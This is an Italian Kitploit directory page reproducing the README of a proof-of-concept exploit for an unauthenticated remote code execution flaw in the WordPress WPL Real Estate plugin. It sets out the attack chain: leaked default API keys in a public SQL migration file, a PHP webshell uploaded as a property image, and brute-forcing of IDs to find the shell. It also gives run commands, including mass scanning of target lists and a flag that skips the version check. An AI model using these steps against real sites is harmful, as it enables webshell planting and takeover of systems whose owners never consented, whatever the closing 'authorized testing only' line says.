Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-14483 — # CVE-2026-14483 POC EXPLOIT BY MADEXPLOITS | Kitploit
Strumenti/GitHubGitHub/madexploits/cve-2026-14483
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingSviluppo Payload
GitHubmadexploits/cve-2026-14483

CVE-2026-14483

# CVE-2026-14483 POC EXPLOIT BY MADEXPLOITS

Vedi Repository
121 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-14483 — WPL Real Estate RCE

Esecuzione remota di codice non autenticata contro il plugin WordPress Realtyna WPL Real Estate Listing.

Scarica lo strumento
CampoDettaglio
CVECVE-2026-14483
Versione interessata<= 5.2.0
Pluginreal-estate-listing-realtyna-wpl
ImpattoCaricamento non autenticato di webshell PHP (RCE)
ScriptCVE-2026-14483.py
AutoreMADEXPLOITS

Di default lo script sfrutta solo target che eseguono WPL 5.2.0. Usa --force per forzare.

IMMAGINE


Riepilogo della vulnerabilità

  1. Perdita di credenziali — I api_key / api_secret predefiniti sono esposti tramite un dump pubblico della migrazione SQL.
  2. Caricamento non autenticato — Queste credenziali autenticano l'API I/O WPL (set_property), consentendo di caricare un file PHP appositamente predisposto come immagine della proprietà.
  3. Individuazione della webshell — La shell caricata si trova in wp-content/uploads/WPL/{property_id}/.

Requisiti

root@kitploit:~
pip install requests colorama
  • Python 3.8+
  • Accesso di rete ai target

Utilizzo

Elenco dei target

Crea un file di testo con un URL di base per riga:

root@kitploit:~
http://wplab.test
https://example.com

Esecuzione di base

root@kitploit:~
python CVE-2026-14483.py --targets targets.txt

Gli URL delle shell trovati vengono aggiunti a result.txt (o --output).

Opzioni complete

root@kitploit:~
python CVE-2026-14483.py \
  --targets targets.txt \
  --output result.txt \
  --user-id 1 \
  --max-id 1000 \
  --timeout 30 \
  --threads 5 \
  --debug \
  --force
ArgomentoPredefinitoDescrizione
--targets(obbligatorio)File con URL di base (uno per riga)
--outputresult.txtFile a cui aggiungere gli URL delle shell trovate
--user-id1ID utente WordPress / WPL proprietario della nuova proprietà
--payloadshell di upload incorporataStringa payload PHP personalizzata
--max-id1000ID massimo della proprietà da provare (brute-force) per individuare la shell
--timeout30Timeout HTTP in secondi
--threads5Thread di lavoro concorrenti
--debugoffLog di debug dettagliato
--forceoffEsegue l'exploit anche se la versione ≠ 5.2.0 o non può essere rilevata

Flusso dell'exploit

root@kitploit:~
Target URL
    │
    ▼
Detect WPL version (readme.txt / wpl.php)
    │  skip unless == 5.2.0 (or --force)
    ▼
Fetch api_key + api_secret from:
  /wp-content/plugins/real-estate-listing-realtyna-wpl/assets/migrations/basic/1.0.0.sql
    │
    ▼
POST set_property via WPL I/O API
  (upload image_0x89MADEXPLOITS.php as image/jpeg)
    │
    ▼
Brute-force property ID 1..max-id
  /wp-content/uploads/WPL/{id}/0x89MADEXPLOITS.php
    │
    ▼
Write shell URL → output file

Marcatore predefinito della shell: MADEXPLOITS
Nome file remoto predefinito: 0x89MADEXPLOITS.php


Esempi

Singolo target di laboratorio (questo workspace):

root@kitploit:~
echo http://wplab.test > targets.txt
python CVE-2026-14483.py --targets targets.txt --debug

Scansione di massa con maggiore concorrenza:

root@kitploit:~
python CVE-2026-14483.py --targets targets.txt --threads 20 --output shells.txt

Forza l'exploit quando il controllo della versione fallisce:

root@kitploit:~
python CVE-2026-14483.py --targets targets.txt --force

Output

root@kitploit:~
[+] Shell found: http://target/wp-content/uploads/WPL/32/0x89MADEXPLOITS.php
[*] Progress: 1/1 | Found: 1
[+] Done. Found 1 shell(s). Check 'result.txt' for URLs.

result.txt contiene un URL di shell per riga.


Note

  • La versione viene letta da Stable tag: / Version: nel readme.txt del plugin, con fallback a wpl.php.
  • Se la shell non viene trovata dopo il caricamento, aumenta --max-id.
  • Destinato esclusivamente a test di sicurezza autorizzati / uso in laboratorio locale.